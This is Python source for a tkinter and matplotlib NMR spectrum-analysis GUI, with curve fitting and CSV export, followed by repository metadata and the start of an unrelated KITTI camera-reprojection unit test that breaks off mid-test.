        self.axes_left1 = self.fig_left1.add_subplot(111)
        self.axes_left1.plot(np.real(spc_mean), color=colors[1], label='Re')
        self.axes_left1.plot(np.imag(spc_mean), color=colors[2], label='Im')
        self.axes_left1.axvline(x=center, color=colors[-1])
        self.axes_left1_vline_l = self.axes_left1.axvline(x=self.range_l_select,
                                                          color=colors[4])
        self.axes_left1_vline_r = self.axes_left1.axvline(x=self.range_r_select,
                                                          color=colors[4])
        self.axes_left1.set_xlim((center -200, center +200))
        self.axes_left1.set_title('Mean spectrum (Drag with left and right mouse button)')
        self.axes_left1.set_xlabel('Frequency (MHz)')
        self.axes_left1.set_ylabel('Signal (A.U.)')
        self.axes_left1.legend(loc='upper left')
        self.axes_left1.grid()
        #plot 4: all spectra stacked, same markers
        self.axes_left2 = self.fig_left2.add_subplot(111)
        for i, spc in enumerate(spcs):
            self.axes_left2.plot(np.real(spc)+np.amax(np.abs(spc_mean))*0.5*i,
                                 color=colors[i%9], label=str(i))
        #BUGFIX: the center line was drawn on axes_left1 a second time here;
        #this plot should carry its own center marker
        self.axes_left2.axvline(x=center, color=colors[-1])
        self.axes_left2_vline_l = self.axes_left2.axvline(x=self.range_l_select,
                                                          color=colors[4])
        self.axes_left2_vline_r = self.axes_left2.axvline(x=self.range_r_select,
                                                          color=colors[4])
        self.axes_left2.set_xlim((center -200, center +200))
        self.axes_left2.margins(0.02, 0.02)
        self.axes_left2.set_title('All FIDs')
        self.axes_left2.set_xlabel('Frequency (MHz)')
        self.axes_left2.set_ylabel('Real part of signal (A.U.)')
        self.axes_left2.grid()
        #draggable vline event
        def Drag(event):
            '''Left/right button drag moves the left/right range marker.'''
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.entry_range_l_var.set(int(event.xdata))
                self.range_l_select = int(event.xdata)
                #update plot
                self.axes_left1_vline_l.set_xdata(event.xdata)
                self.axes_left2_vline_l.set_xdata(event.xdata)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
            if event.button == 3 and event.inaxes != None:
                #find the index of selected points
                self.entry_range_r_var.set(int(event.xdata))
                self.range_r_select = int(event.xdata)
                #update plot
                self.axes_left1_vline_r.set_xdata(event.xdata)
                self.axes_left2_vline_r.set_xdata(event.xdata)
                self.fig_left1.canvas.draw()
                self.fig_left2.canvas.draw()
        self.axes_left1_vline_drag = self.fig_left1.canvas.mpl_connect('motion_notify_event', Drag)
        self.axes_left2_vline_drag = self.fig_left2.canvas.mpl_connect('motion_notify_event', Drag)
        self.fig_left1.canvas.draw()
        self.fig_left2.canvas.draw()
class Frame_plot_spc_view(tk.Frame):
'''Pioneer first T2 preview plot'''
def __init__(self, parent, trace):
'''makes the subframe and fills it up'''
tk.Frame.__init__(self, parent)
self.pack(side='left', anchor='n')
#reference to parent
self.parent = parent
#reference to current trace:
self.trace = trace
#load widgets
self.Widgets()
#global key bind
root.bind('<Right>', self.Confirm)
def Widgets(self):
'''Builds all the subframes and canvases'''
#button commands
def Disable(event=None):
'''Disables and red-flags the point to avoid plotting'''
#try:
self.trace.disabled = not self.trace.disabled
#except:
# self.trace.disabled = True
self.Refresh_parameters()
def Repeat(event=None):
'''Clears the T2 trace and starts the analysis from scratch'''
self.trace.Reinit()
self.Confirm()
self.trace.analysed = False
#bottom button row
self.frame_bottom = tk.Frame(self)
self.frame_bottom.pack(side='bottom', fill='x')
#split in columns
self.frame_parameters = tk.Frame(self, bd=5)
self.frame_parameters.pack(side='left', anchor='n')
self.frame_plot = tk.Frame(self, bd=5)
self.frame_plot.pack(side='left', anchor='n')
self.frame_fit = tk.Frame(self, bd=5)
self.frame_fit.pack(side='left', anchor='n', fill='y')
#parameters
self.label_parameters = tk.Label(self.frame_parameters, text='Parameters')
self.label_parameters.pack(side='top')
self.tree_columns = ('Name','Value')
self.tree_parameters = ttk.Treeview(self.frame_parameters, columns=self.tree_columns,
show='headings', selectmode='none', height=25)
self.tree_parameters.pack(side='top',fill='y', expand=True)
#define column widths
self.tree_parameters.column('Name', width=80)
self.tree_parameters.column('Value', width=120)
#define column names
for column in self.tree_columns:
self.tree_parameters.heading(column, text=column)
#display in degrees
#fill in params
self.Refresh_parameters()
# disable point button
self.button_disable = ttk.Button(self.frame_parameters, text='Disable/enable Point',
command=Disable, width=20)
self.button_disable.pack(side='top')
#redo analysis button
self.button_repeat = ttk.Button(self.frame_parameters, text='Repeat analysis',
command=Repeat, width=20)
self.button_repeat.pack(side='top')
#point plot
self.fig_spc = plt.figure(dpi=100, figsize=(8,3))
self.fig_spc.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.92)
self.fig_spc.suptitle(self.trace.file_key, x=0.01, horizontalalignment='left')
self.canvas_spc = FigureCanvasTkAgg(self.fig_spc, self.frame_plot)
self.canvas_spc._tkcanvas.pack()
#glue plot
self.fig_glue = plt.figure(dpi=100, figsize=(8,4))
self.fig_glue.subplots_adjust(bottom=0.15, left= 0.10, right=0.96, top=0.92)
self.canvas_glue = FigureCanvasTkAgg(self.fig_glue, self.frame_plot)
self.canvas_glue._tkcanvas.pack()
#fitting range variables
self.fit_range_l_var = tk.IntVar(self, value=0)
self.fit_range_r_var = tk.IntVar(self, value=len(self.trace.fr_list))
try:
self.fit_range_l_var.set(self.trace.fit_range[0])
self.fit_range_r_var.set(self.trace.fit_range[1])
except:
pass
self.Fill_plot()
self.Fitting_frame()
## #add button to confirm selection
## self.button_confirm = ttk.Button(self.frame_bottom, text='Confirm', command=self.Confirm)
## self.button_confirm.pack(side='right')
## self.button_confirm.bind('<Return>', self.Confirm)
##
## #add button to export spectra
## self.button_confirm = ttk.Button(self.frame_bottom, text='Export CSV', command=self.Export)
## self.button_confirm.pack(side='right')
def Fitting_frame(self, event=None):
'''Repacks/initializes the fitting frame for the selected fitting function'''
#repack if existing:
try:
self.frame_fit.destroy()
except:
pass
#fit frame
self.frame_fit = tk.Frame(self, bd=5)
self.frame_fit.pack(side='left', anchor='n', fill='y')
#fit functions
def Fit_lorentz(x, x0=0, a=500, g=1000):
'''Lorentzian lineshape model'''
return a*g/np.pi/(g**2 + (x-x0)**2)
def Asym(x, x0, c):
'''The smoothened function used to assymetrise'''
b = 10
return np.abs(c)/(1+np.exp((x-x0)*np.sign(c)*b))+1
def Fit_lorentz_asymmetric(x, x0=0, a=500, g=1000, c=0.2):
'''Lorentzian lineshape model with asymmetry'''
ga = g*Asym(x, x0, c)
aa = a*Asym(x, x0, c)
return aa*ga/np.pi/(ga**2 + (x-x0)**2)
## def Fit_lorentz_asymmetric(x, x0=0, a=500, g=1000, b=1, c=0):
## '''Lorentzian with fermi changing linewidth for asymmetry'''
## g2 = g*(1/(1+np.exp((x-x0)/b)) + c)
## return a*g2/np.pi/(g2**2 + (x-x0)**2)
def Fit_polynom(x, x0=0, a=1, b=0, c=0, d=0):
'''T1 fit model for spin 3/2'''
return a*(x-x0)**3 + b*(x-x0)**2 + c*(x-x0) + d
def Fit_gaussian(x, x0=0, a=1, s=1000):
'''Gaussian lineshape model'''
return a/(s*np.sqrt(2*np.pi))*np.exp(-0.5*((x-x0)/s)**2)
#reference to functions
# [function, fit_params, start guess, label, tex_form]
self.fit_names = {'Lorentz':[Fit_lorentz, ['x0', 'a', 'g'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
self.trace.spc_list_points[int(len(self.trace.fr_list)/2)],
self.trace.fr_list[-1]-self.trace.fr_list[0]/2
],
'a*g/pi/(g^2+(x-x0)^2)'
],
'Asymmetric':[Fit_lorentz_asymmetric, ['x0', 'a', 'g', 'c'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
self.trace.spc_list_points[int(len(self.trace.fr_list)/2)],
self.trace.fr_list[-1]-self.trace.fr_list[0]/2,
0
],
'a*g(x)/pi/(g(x)^2+(x-x0)^2)'
],
'Polynom':[Fit_polynom, ['x0','a','b','c','d'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
1,
3*self.trace.fr_list[int(len(self.trace.fr_list)/2)],
0,
0],
'a*x^3+b*x^2+c*x+d'
],
'Gauss':[Fit_gaussian, ['x0', 'a', 's'],
[self.trace.fr_list[int(len(self.trace.fr_list)/2)],
self.trace.spc_list_points[int(len(self.trace.fr_list)/2)],
self.trace.fr_list[-1]-self.trace.fr_list[0]/2
],
'a*/sqrt(2*pi)*exp(-0.5*((x-x0)/s)**2)^2'
]
}
def Fit():
'''Executes the fit with given parameters and plots it'''
Fit_function = self.fit_names[self.combo_fit_var.get()][0]
#read values from entry boxes
start_params = dict()
for entry,param in zip(self.entry_params_start, param_list):
start_params[param]=float(entry.get())
#data points
fit_range=(int(self.fit_range_l_var.get()), int(self.fit_range_r_var.get()))
#print(fit_range)
x = self.trace.fr_list
x2 = self.trace.fr_list[slice(*fit_range)]
y = self.trace.spc_list_points[slice(*fit_range)]
#print(x,y)
y_start = [Fit_function(xx, **start_params) for xx in x]
#check if last parameter is enabled or not
p_start = [start_params[key] for key in param_list]
## if not self.check_params_start_var.get():
## p_start.pop(-1)
## self.entry_params_fit[-1].config(state='normal')
## self.entry_params_fit[-1].delete(0, 'end')
## self.entry_params_fit[-1].insert('end', 1)
## self.entry_params_fit[-1].config(state='readonly')
#run fit, p_optimal, p_covariance matrix
try:
popt,pcov = curve_fit(Fit_function, x2, y, p0=p_start)
y_fit = [Fit_function(xx, *popt) for xx in x]
except:
return
#print values to entry boxes
for i,p in enumerate(popt):
self.entry_params_fit[i].config(state='normal')
self.entry_params_fit[i].delete(0, 'end')
self.entry_params_fit[i].insert('end','%.4g' %p)
self.entry_params_fit[i].config(state='readonly')
#update plots
self.axes_start_plot.set_ydata(y_start)
self.axes_fit_plot.set_ydata(y_fit)
self.fig_spc.canvas.draw()
#save parameters
self.trace.fit_params = popt
self.trace.fit_param_cov = pcov
self.trace.fr = popt[0]
self.trace.width = popt[2]
self.trace.fit_range = fit_range
## if self.check_params_start_var.get():
## self.trace.r = popt[-1]
## else:
## self.trace.r = 1
self.Refresh_parameters()
def Change_fit(event=None):
'''Changes the current fitting function'''
#update memory in parent
self.parent.temperatures.previous_t1['fit']=self.combo_fit_var.get()
#repack the entries
self.Fitting_frame()
#rerun
#Fit()
#implement more options later if necessary
self.label_fit = tk.Label(self.frame_fit, text='Fitting function')
self.label_fit.pack(side='top')
self.combo_fit_var = tk.StringVar()
try:
self.combo_fit_var.set(self.parent.temperatures.previous_spc['fit'])
except KeyError:
self.combo_fit_var.set('Lorentz')
self.parent.temperatures.previous_spc['fit']='Lorentz'
self.combo_fit = ttk.Combobox(self.frame_fit, state='readonly', values=sorted(list(self.fit_names.keys())),
textvar=self.combo_fit_var)
self.combo_fit.pack(side='top')
self.combo_fit.bind("<<ComboboxSelected>>", Change_fit)
self.label_fit_fun = tk.Label(self.frame_fit, text=self.fit_names[self.combo_fit_var.get()][3], bd=5)
self.label_fit_fun.pack(side='top')
self.label_starting_params = tk.Label(self.frame_fit, text='Starting values', bd=5)
self.label_starting_params.pack(side='top')
param_list = self.fit_names[self.combo_fit_var.get()][1]
#guesses for where params should start
start_guess = self.fit_names[self.combo_fit_var.get()][2]
## start_guess = [self.trace.tau_list[self.trace.mean_range[0]-5],
## np.mean(self.trace.area_list[slice(*self.trace.mean_range)]),
## -self.trace.area_list[0]/self.trace.area_list[-1],
## 1]
## if self.combo_fit_var.get() == 'Spin 3/2':
## start_guess[0] = start_guess[0]*6
#start parameters entry rows
self.frame_params_start = list()
self.label_params_start = list()
self.entry_params_start = list()
for i,param in enumerate(param_list):
self.frame_params_start.append(tk.Frame(self.frame_fit))
self.frame_params_start[i].pack(side='top', fill='y')
self.label_params_start.append(tk.Label(self.frame_params_start[i], text=param+' = '))
self.label_params_start[i].pack(side='left', anchor='e')
self.entry_params_start.append(tk.Entry(self.frame_params_start[i],
width=10, justify='right'))
self.entry_params_start[i].insert(0, '%.4g' % start_guess[i])
self.entry_params_start[i].pack(side='left', anchor='e')
#check button for stretch
## self.check_params_start_var = tk.BooleanVar(self, 0)
## try:
## if self.trace.r != 1:
## self.check_params_start_var.set(1)
## except AttributeError: pass
## self.check_params_start = (ttk.Checkbutton(self.frame_params_start[-1],
## variable=self.check_params_start_var))
## self.check_params_start.pack(side='left')
self.button_fit = ttk.Button(self.frame_fit, text='Retry fit', command=Fit)
self.button_fit.pack(side='top')
self.label_fit_params = tk.Label(self.frame_fit, text='Fitted values', bd=5)
self.label_fit_params.pack(side='top')
#fit results entry rows
self.frame_params_fit = list()
self.label_params_fit = list()
self.entry_params_fit = list()
for i,param in enumerate(param_list):
self.frame_params_fit.append(tk.Frame(self.frame_fit))
self.frame_params_fit[i].pack(side='top', fill='y')
self.label_params_fit.append(tk.Label(self.frame_params_fit[i], text=param+' = '))
self.label_params_fit[i].pack(side='left')
self.entry_params_fit.append(tk.Entry(self.frame_params_fit[i], width=10,
state='readonly', justify='right'))
self.entry_params_fit[i].pack(side='left')
#run first lap of fit
Fit()
#add button to confirm selection
self.button_confirm = ttk.Button(self.frame_fit, text='Confirm', command=self.Confirm)
self.button_confirm.pack(side='bottom')
self.button_confirm.bind('<Return>', self.Confirm)
#add export csv button
self.button_export = ttk.Button(self.frame_fit, text='Export CSV', command=self.Export)
self.button_export.pack(side='bottom')
self.button_export.bind('<F5>', self.Export)
#add export glue button
self.button_export_glue = ttk.Button(self.frame_fit, text='Export Glue', command=self.Export_glue)
self.button_export_glue.pack(side='bottom')
self.button_export_glue.bind('<F6>', self.Export_glue)
    def Confirm(self, event=None):
        '''Confirm the selection in this screen and hand control back.

        Bound both to the Confirm button and to the <Return> key (hence
        the unused *event* parameter).
        '''
        #unpack, don't destroy until the series is done, in case corrections are needed
        self.parent.temperatures.wait.set(False)  # releases the waiting loop in the parent
        self.pack_forget()
        self.destroy()
        plt.close('all')  # free all matplotlib figures opened by this frame
        #move to later stages
        self.trace.analysed = True
def Refresh_parameters(self):
'''refreshes the parameters table'''
self.tree_parameters.delete(*self.tree_parameters.get_children())
self.trace.Get_params()
for item in GLOBAL_spc_displayed_params:
try:
pair = (item, self.trace.__dict__[item])
self.tree_parameters.insert('', 'end', values=pair)
except: pass
def Export(self):
'''Saves the plotted data into a CSV file for further analysis'''
file_name = self.trace.__dict__['file_key'] + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'spc')
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['fr(MHz)', 'area(A.U.)'])
#data
for i in range(len(self.trace.fr_list)):
row = [self.trace.fr_list[i], self.trace.spc_list_points[i]]
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
def Export_glue(self):
'''Saves the glue points into a CSV file'''
file_name = self.trace.__dict__['file_key'] + '.csv'
file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'glue_spc')
#make the csv folder for old experiments
try:
os.mkdir(file_directory)
except: pass
#define data lines
x = self.trace.spc_fr
y = self.trace.spc_sig_real
y2 = self.trace.spc_sig_imag
y3 = np.sqrt(y**2 + y2**2)
#write file
with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
writer = csv.writer(f, delimiter=';')
#name row
writer.writerow(['fr(MHz)', 'Re(A.U.)','Im(A.U.)','Abs(A.U.)'])
#data
for i in range(len(x)):
row = [x[i], y[i], y2[i], y3[i]]
writer.writerow(row)
tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
    def Fill_plot(self):
        '''Plots the delta spectrum with fit overlays, plus the glued spectrum.

        Also installs a mouse-drag handler so the fit-range markers can be
        moved directly on the spectrum plot (left button = left marker,
        right button = right marker).
        '''
        #data lines
        x = self.trace.fr_list
        y = self.trace.spc_list_points
##        sorting = np.argsort(x)
##        x = np.array(x)[sorting]
##        y = np.array(y)[sorting]
        #point plot
        self.axes = self.fig_spc.add_subplot(111)
        self.axes.plot(x, y, marker='o', linestyle='-', color=colors[1], label='Data')
        # fit overlays start as copies of the data; Fit() updates their ydata later
        self.axes_start_plot, = self.axes.plot(x, y, color=colors[3],
                                               linestyle='dashed', label='Fit start')
        self.axes_fit_plot, = self.axes.plot(x, y, color=colors[4], label='Fit')
        # vertical markers delimiting the fit range (draggable, see Drag below)
        self.axes_vline_l = self.axes.axvline(x=self.trace.fr_list[self.fit_range_l_var.get()], color=colors[4])
        self.axes_vline_r = self.axes.axvline(x=self.trace.fr_list[self.fit_range_r_var.get()-1], color=colors[4])
        self.axes.set_title('Delta spectrum')
        self.axes.set_xlabel(r'$\nu$ (MHz)')
        self.axes.set_ylabel('Area (A.U.)')
        legend = self.axes.legend(loc='lower right')
        self.axes.grid()
        x = self.trace.spc_fr
        y = self.trace.spc_sig_real
        y2 = self.trace.spc_sig_imag
        y3 = np.sqrt(y**2 + y2**2)
        #glue plot
        self.axes_glue = self.fig_glue.add_subplot(111)
        self.axes_glue.plot(x, y, color=colors[1], label='Re')
        self.axes_glue.plot(x, y2, color=colors[2], label='Im')
        self.axes_glue.plot(x, y3, color=colors[3], label='Abs')
        self.axes_glue.set_title('Glued spectrum')
        self.axes_glue.set_xlabel(r'$\nu$ (MHz)')
        self.axes_glue.set_ylabel('Signal (A.U.)')
        legend = self.axes_glue.legend(loc='lower right')
        self.axes_glue.grid()
        #draggable vline event
        def Drag(event):
            '''Allows dragging of the markers for fit range on spectrum plot'''
            # left mouse button moves the left marker
            if event.button == 1 and event.inaxes != None:
                #find the index of selected points
                self.fit_range_l_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='right'))
                #print(self.fit_range_l_var.get())
                #self.range_l_select = int(event.xdata)
                #update plot
                self.axes_vline_l.set_xdata(event.xdata)
                self.fig_spc.canvas.draw()
            # right mouse button moves the right marker
            if event.button == 3 and event.inaxes != None:
                #find the index of selected points
                self.fit_range_r_var.set(np.searchsorted(self.trace.fr_list, event.xdata, side='left'))
                #print(self.fit_range_r_var.get())
                #self.range_r_select = int(event.xdata)
                #update plot
                self.axes_vline_r.set_xdata(event.xdata)
                self.fig_spc.canvas.draw()
        self.axes_vline_drag = self.fig_spc.canvas.mpl_connect('motion_notify_event', Drag)
class Frame_plot_spc_frvt(tk.Frame):
    '''Frame plotting the frequency-vs-temperature trend of a spectrum series.

    Shows three matplotlib canvases (frequency on log-T, frequency on
    linear-T, linewidth) plus Confirm / Export CSV buttons.
    '''
    def __init__(self, parent, trace):
        '''Makes the subframe and fills it up.

        parent -- the owning application frame
        trace  -- dict of analysed traces keyed by temperature
        '''
        tk.Frame.__init__(self, parent)
        self.pack(side='left', anchor='n')
        #reference to parent
        self.parent = parent
        #reference to current series
        self.trace = trace
        #counter for plots (used to pick a colour per added trace)
        self.counter = 0
        #load widgets
        self.Widgets()
    def Widgets(self):
        '''Builds all the subframes, canvases and buttons'''
        #button commands
        def Confirm(event=None):
            '''Confirm the selection in this screen'''
            #unpack, don't destroy until series is done, in case corrections are needed
            self.parent.temperatures.wait.set(False)
            self.pack_forget()
            self.destroy()
            plt.close('all')
            self.parent.traces.button_show.config(state='normal')
        #split in columns
        self.frame_plot_left = tk.Frame(self)
        self.frame_plot_left.pack(side='left', anchor='n')
        self.frame_plot_right = tk.Frame(self)
        self.frame_plot_right.pack(side='left', anchor='n')
        #plot frames
        self.frame_plot1 = tk.Frame(self.frame_plot_left, bd=5)
        self.frame_plot1.pack(side='top', anchor='n')
        self.frame_plot2 = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_plot2.pack(side='top', anchor='n')
        self.frame_plot3 = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_plot3.pack(side='top', anchor='n')
        #buttons frame
        self.frame_buttons = tk.Frame(self.frame_plot_right, bd=5)
        self.frame_buttons.pack(side='top', anchor='e')
        #T1 plot
        self.fig_t1vt = plt.figure(dpi=100, figsize=(7,4.5))
        self.fig_t1vt.subplots_adjust(bottom=0.12, left= 0.11, right=0.96, top=0.94)
        self.canvas_t1vt = FigureCanvasTkAgg(self.fig_t1vt, self.frame_plot1)
        self.canvas_t1vt._tkcanvas.pack()
        #fr plot
        self.fig_fr = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_fr.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
        self.canvas_fr = FigureCanvasTkAgg(self.fig_fr, self.frame_plot2)
        self.canvas_fr._tkcanvas.pack()
        #stretch plot
        self.fig_r = plt.figure(dpi=100, figsize=(7,2.5))
        self.fig_r.subplots_adjust(bottom=0.18, left= 0.11, right=0.96, top=0.90)
        self.canvas_r = FigureCanvasTkAgg(self.fig_r, self.frame_plot3)
        self.canvas_r._tkcanvas.pack()
        #add button to confirm selection
        self.button_confirm = ttk.Button(self.frame_buttons, text='Confirm', command=Confirm)
        self.button_confirm.pack(side='right')
        self.button_confirm.bind('<Return>', Confirm)
        #plot the stuff
        self.Fill_plot()
        #add button to export parameters
        self.button_export = ttk.Button(self.frame_buttons, text='Export CSV', command=self.Export)
        self.button_export.pack(side='right')
    def Add_trace(self, trace):
        '''Adds one trace (temperature series) to the three plots.

        Only temperatures that are analysed and not disabled contribute.
        Also stores the sorted arrays in self.data for Export().
        '''
        #initialize lists
        x = list()
        fr = list()
        width = list()
        amp = list()
        for temp in self.trace:
            if self.trace[temp].analysed and not self.trace[temp].disabled:
                x.append(self.trace[temp].temp_set)
                #maybe calculate some center frequency at some point?
                fr.append(self.trace[temp].fr)
                width.append(self.trace[temp].width)
                amp.append(self.trace[temp].fit_params[1])
                name = self.trace[temp].file_key
        #sort by temperature
        sorting = np.argsort(x)
        x = np.array(x)[sorting]
        fr = np.array(fr)[sorting]
        width = np.array(width)[sorting]
        amp = np.array(amp)[sorting]
        #draw trace
        self.axes_1.plot(x, fr, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        self.axes_2.plot(x, fr, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        self.axes_3.plot(x, 2*width, 'bo', color=colors[self.counter],
                         label=self.parent.current_trace, linestyle='dashed')
        #save for export
        self.data = dict()
        self.data['T'] = x
        self.data['fr'] = fr
        self.data['FWHM'] = 2*width  # full width = twice the half-width
        self.data['amp'] = amp/np.pi/width  # Lorentzian peak amplitude from area
        #increase plot counter
        self.counter += 1
    def Export(self):
        '''Saves the plotted data into a CSV file for further analysis'''
        file_name = self.parent.current_trace + '.csv'
        file_directory = os.path.join('data', self.parent.current_experiment, 'csv', 'spc')
        #make the csv folder for old experiments
        # NOTE(review): the bare except hides any mkdir failure besides
        # "already exists"; os.makedirs(..., exist_ok=True) would be safer
        try:
            os.mkdir(file_directory)
        except: pass
        #write file
        with open(os.path.join(file_directory, file_name), 'w', newline='') as f:
            writer = csv.writer(f, delimiter=';')
            #name row
            writer.writerow(['T(K)', 'fr(MHz)','FWHM(MHz)','amplitude'])
            #data
            for i in range(len(self.data['T'])):
                row = [self.data['T'][i], self.data['fr'][i], self.data['FWHM'][i], self.data['amp'][i]]
                writer.writerow(row)
        tk.messagebox.showinfo('Export complete', 'The file was saved as '+file_name)
    def Fill_plot(self):
        '''Creates and styles the three (initially empty) axes for the trend plots'''
        self.axes_1 = self.fig_t1vt.add_subplot(111)
        self.axes_1.set_xscale('log')
        #self.axes_1.set_yscale('log')
        self.axes_1.set_title('Frequency temperature dependence')
        self.axes_1.set_xlabel('Temperature (K)')
        self.axes_1.set_ylabel(r'Frequency (MHz)')
        #self.axes_1.legend(loc='lower right')
        self.axes_1.grid()
        self.axes_2 = self.fig_fr.add_subplot(111)
        self.axes_2.set_title('Frequency temperature dependence')
        self.axes_2.set_xlabel('Temperature (K)')
        self.axes_2.set_ylabel('Frequency (MHz)')
        #self.axes_2.get_yaxis().get_major_formatter().set_useOffset(False)
        self.axes_2.margins(0.05, 0.1)
        self.axes_2.grid()
        self.axes_3 = self.fig_r.add_subplot(111)
        self.axes_3.set_title('Linewidth')
        self.axes_3.set_xlabel('Temperature (K)')
        self.axes_3.set_ylabel('Linewidth')
        #self.axes_3.get_yaxis().get_major_formatter().set_useOffset(False)
        self.axes_3.margins(0.05, 0.1)
        self.axes_3.grid()
class Main_application(tk.Frame):
    '''Main application frame wiring together all sub sections'''
    def __init__(self, parent, *args, **kwargs):
        '''Initializes the main application as a frame in tkinter.

        parent -- the tk root window
        '''
        #check for computers screen resolution
        # NOTE(review): reads the global `root` rather than `parent` -- works
        # only when constructed from the __main__ guard below; confirm intent
        width_px = root.winfo_screenwidth()
        height_px = root.winfo_screenheight()
        if width_px < 1720:
            self.Warn_resolution()
        tk.Frame.__init__(self, parent, height=1020, width =1720, *args, **kwargs)
        self.parent = parent
        # sets the window title
        self.parent.wm_title('NMR data analysis and overview')
        #sets the window minimal size
        self.parent.minsize(width=1880, height=770)
        # allow editing the exit command
        self.parent.protocol('WM_DELETE_WINDOW', self.On_close)
        #makes the window stretchable
        self.pack(fill='both', expand=True)
        self.pack()
        #place to save Experiment_data classes
        self.Open_data()
        #calls subframes and packs them
        self.Sub_frames()
    def Open_data(self):
        '''Opens all experiments from the 'data' subdirectory of the cwd.

        If no 'data' directory exists, offers to create one.
        '''
        self.data = dict()
        #adds the existing experiments
        if os.path.isdir('data'):
            for entry in os.scandir('data'):
                if entry.is_dir():
                    #initiates a dict of the experiment data classes
                    self.data[entry.name] = Experiment_data(entry.name)
        #makes the raw experiment folder
        else:
            msg = 'The current directory does not contain the correct file structure.' \
                  '\nCreate new folders in current directory?'
            if tk.messagebox.askyesno('No data in current directory', msg):
                os.mkdir('data')
    def Sub_frames(self):
        '''Creates all the subframes and positions them'''
        #first column
        self.experiments = Frame_experiments(self)
        #self.experiments.pack(side='left', fill='y')
        #second column
        self.traces = Frame_traces(self)
        #self.traces.pack(side='left', fill='y')
        #3rd column
        self.temperatures = Frame_temperatures(self)
        #self.temperatures.pack(side='left', fill ='y')
        ## construct it every time instead (to avoid memory problems)
        #4th column, plotter (placeholder class, plotter built on demand)
        class Tracer():
            pass
        #self.plot1 = Frame_plot_T1_view(self, Tracer)
        #temporary pack
        #self.plot1.pack(side='left', fill='both', expand=True)
    def On_close(self):
        '''Actions to execute when the master window is closed with ('X')'''
        msg = 'Are you sure you want to close the program?\n' \
              'Unsaved data will be lost!'
        if tk.messagebox.askokcancel('Quit', msg):
            #close all plots and figures
            plt.close('all')
            self.parent.destroy()
    def Warn_resolution(self):
        '''Warns the user that the resolution of the program is not optimal for the monitor'''
        msg = 'The resolution of the program is larger than the resolution of the monitor!\n' \
              'The program might not function or appear properly!'
        tk.messagebox.showerror('Error', msg)
        #implement parameters for smaller figure sizes to account for smaller resolution!!
def Error_incomplete():
    '''Notify the user that the requested feature does not exist yet.'''
    message = 'The function is not yet implemented!'
    tk.messagebox.showerror('Error', message)
def Quit_program():
    '''Destroys the global root window and thereby quits tkinter.'''
    root.destroy()
# Entry point: only build the GUI when run as a standalone script.
if __name__ == '__main__':
    '''Initializes tkinter and main application if this is a standalone file'''
    root = tk.Tk()
    Main_application(root)
    root.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
e4d3d004e7b938a470815cf4ee2286e25d8d3eef | cbe65c1f19e869d953c5dac0b103e9cd9cb47c2c | /dataset_preparation/test_cameras.py | 54ff5816efb1849593a842d600cf3bf4bf8e3154 | [
"MIT"
] | permissive | aTeK7/deep-stereo1.4 | 997148e3cde0eaf3537e2b1df15eda7974ccdb51 | dd2150097d0ed1c05791e4d80cf9b404f98a6880 | refs/heads/master | 2021-05-12T18:22:46.757206 | 2018-01-11T07:44:48 | 2018-01-11T07:44:48 | 117,065,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,107 | py | import numpy as np
np.set_printoptions(suppress=True)
import unittest
from kitti_camera import KittiCamera
from kitti_generator import KittiGenerator, extract_multipatch
from reprojection.reprojection import Reprojection
from scipy import misc
import timeit
import matplotlib.image as mpimg
from dataset_preparation.set_generator import SetGenerator
import os
class CameraParserTest(unittest.TestCase):
    '''Smoke tests for the KITTI camera / generator / reprojection pipeline.

    NOTE(review): these tests rely on hard-coded paths to a locally mounted
    KITTI dataset and make no assertions -- they only check that the
    pipeline runs without raising.
    '''
    # absolute paths to a local copy of the KITTI odometry dataset
    sequences_path = "/Volumes/Bahia/kitti-dataset/sequences"
    calibration_path = "/Volumes/Bahia/kitti-dataset/calibration"
    dataset_path = "/Volumes/Bahia/kitti-dataset"
    def test_parse_kitti(self):
        # parse the calibration of sequence "00" and fetch all four cameras
        sequence = "00"
        camera = 0
        kittiCams = KittiCamera(self.calibration_path, sequence)
        cam0 = kittiCams.getCamera(0)
        cam1 = kittiCams.getCamera(1)
        cam2 = kittiCams.getCamera(2)
        cam3 = kittiCams.getCamera(3)
    def test_kitti_generator(self):
        # generate one training subset and its patch coordinates
        kittiGen = KittiGenerator(self.sequences_path)
        # print kittiGen.sequence_names
        # print kittiGen.sq_len
        # print kittiGen.sq_dimensions
        sq_num, subset = kittiGen.generate_set()
        # print subset
        patches = kittiGen.generate_patch(sq_num)
        # print patches
    def test_kitti_camera_depth_plane(self):
        kittiCams = KittiCamera(self.calibration_path, "00")
        cam_original = kittiCams.getCamera(0)
        cam_virtual = kittiCams.getCamera(1)
        # reprojection object
        r = Reprojection(cam_original, cam_virtual)
        # generate set
        kittiGen = KittiGenerator(self.sequences_path)
        sq_num, subset = kittiGen.generate_set()
        # print subset
        start_time_read = timeit.default_timer()
        image_set = [
            misc.imread(subset[0]),
            misc.imread(subset[1]),
            misc.imread(subset[2]),
            misc.imread(subset[3]),
            misc.imread(subset[4])
        ]
        start_time = timeit.default_timer()
        patches = kittiGen.generate_patch(sq_num)
        # NOTE(review): MultiprocessorExtractor is never imported in this file
        # (the FileChunkProcessor import is commented out) -- this line will
        # raise NameError at runtime; confirm the intended import.
